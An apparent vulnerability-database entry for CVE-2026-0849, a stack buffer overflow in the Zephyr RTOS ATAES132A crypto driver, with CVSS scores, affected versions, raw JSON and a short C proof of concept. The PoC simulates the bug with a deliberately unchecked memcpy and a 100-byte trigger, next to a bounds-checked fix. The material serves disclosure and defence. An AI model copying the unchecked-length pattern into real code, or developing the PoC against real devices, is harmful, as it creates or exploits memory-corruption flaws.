Security Vulnerability Report
CVE-2026-0849 CVSS 3.8 LOW

CVE-2026-0849

Published: 2026-03-16 14:18:07
Last Modified: 2026-04-02 14:26:59

Description

Malformed ATAES132A responses with an oversized length field overflow a 52-byte stack buffer in the Zephyr crypto driver, allowing a compromised device or bus attacker to corrupt kernel memory and potentially hijack execution.

CVSS Details

CVSS Score: 3.8
Severity: LOW
CVSS Vector: CVSS:3.1/AV:P/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:o:zephyrproject:zephyr:4.3.0:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:zephyrproject:zephyr:4.3.0:rc1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:zephyrproject:zephyr:4.3.0:rc2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:zephyrproject:zephyr:4.3.0:rc3:*:*:*:*:*:* - VULNERABLE
Zephyr Project RTOS < fixed version (see the official Zephyr security advisory GHSA-ff4p-3ggg-prp6)
Zephyr crypto driver (ataes132a driver module)
All devices that use the ATAES132A crypto chip with the Zephyr crypto driver enabled

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// CVE-2026-0849 PoC - Zephyr ATAES132A Buffer Overflow
// This PoC demonstrates the buffer overflow condition in Zephyr crypto driver
// when processing malformed ATAES132A responses
#include <stdint.h>
#include <string.h>
#include <stdio.h>

// Vulnerable function signature (simulating Zephyr driver behavior)
void ataes132a_process_response_vulnerable(uint8_t *response) {
    // Stack buffer with fixed size of 52 bytes (as mentioned in CVE)
    uint8_t stack_buffer[52];

    // Length field from response - NOT validated before use
    uint16_t length = (response[0] << 8) | response[1];

    // Vulnerable: Direct copy without bounds checking
    // If length > 52, this causes stack buffer overflow
    memcpy(stack_buffer, response + 2, length);
    printf("Processed %d bytes\n", length);
}

// Proof of concept trigger
void trigger_overflow(void) {
    // Craft malicious response with oversized length field
    uint8_t malicious_response[128];

    // Length field: 100 bytes (exceeds 52-byte buffer)
    malicious_response[0] = 0x00;
    malicious_response[1] = 0x64; // 100 in decimal

    // Fill with overflow data (shellcode or ROP chain in real attack)
    memset(malicious_response + 2, 0x41, 100); // Fill with 'A'

    // Trigger vulnerable function
    ataes132a_process_response_vulnerable(malicious_response);
}

// Safe version with proper bounds checking
void ataes132a_process_response_safe(uint8_t *response) {
    uint8_t stack_buffer[52];
    uint16_t length = (response[0] << 8) | response[1];

    // Fixed: Validate length before copy
    if (length > sizeof(stack_buffer)) {
        printf("ERROR: Length %d exceeds buffer size %zu\n", length, sizeof(stack_buffer));
        return; // Reject oversized response
    }

    memcpy(stack_buffer, response + 2, length);
    printf("Processed %d bytes safely\n", length);
}

int main(void) {
    printf("CVE-2026-0849 PoC - Zephyr ATAES132A Buffer Overflow\n");
    printf("==================================================\n\n");

    printf("Testing vulnerable version:\n");
    trigger_overflow();

    printf("\nTesting safe version:\n");
    uint8_t safe_response[128] = {0x00, 0x64};
    memset(safe_response + 2, 0x41, 100);
    ataes132a_process_response_safe(safe_response);

    return 0;
}

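References

https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-ff4p-3ggg-prp6 (Exploit, Patch, Vendor Advisory)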

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0849", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:18:07.270", "lastModified": "2026-04-02T14:26:59.037", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Malformed ATAES132A responses with an oversized length field overflow a 52-byte stack buffer in the Zephyr crypto driver, allowing a compromised device or bus attacker to corrupt kernel memory and potentially hijack execution."}, {"lang": "es", "value": "Respuestas ATAES132A malformadas con un campo de longitud sobredimensionado desbordan un búfer de pila de 52 bytes en el controlador criptográfico de Zephyr, permitiendo a un dispositivo comprometido o a un atacante del bus corromper la memoria del kernel y potencialmente secuestrar la ejecución."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 3.8, "baseSeverity": "LOW", "attackVector": "PHYSICAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 0.4, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-120"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": 
"cpe:2.3:o:zephyrproject:zephyr:4.3.0:-:*:*:*:*:*:*", "matchCriteriaId": "EA3FCE94-ECC0-421B-B359-8AC2F4FF9589"}, {"vulnerable": true, "criteria": "cpe:2.3:o:zephyrproject:zephyr:4.3.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "A9F6045A-6985-43A5-A0C3-19CF4E3D0ACF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:zephyrproject:zephyr:4.3.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "F46D01CA-AD60-4A2F-91E0-44BDD4C6EDDA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:zephyrproject:zephyr:4.3.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "0A85B354-1551-4500-8775-CEFEE279579D"}]}]}], "references": [{"url": "https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-ff4p-3ggg-prp6", "source": "[email protected]", "tags": ["Exploit", "Patch", "Vendor Advisory"]}, {"url": "https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-ff4p-3ggg-prp6", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Patch", "Vendor Advisory"]}]}}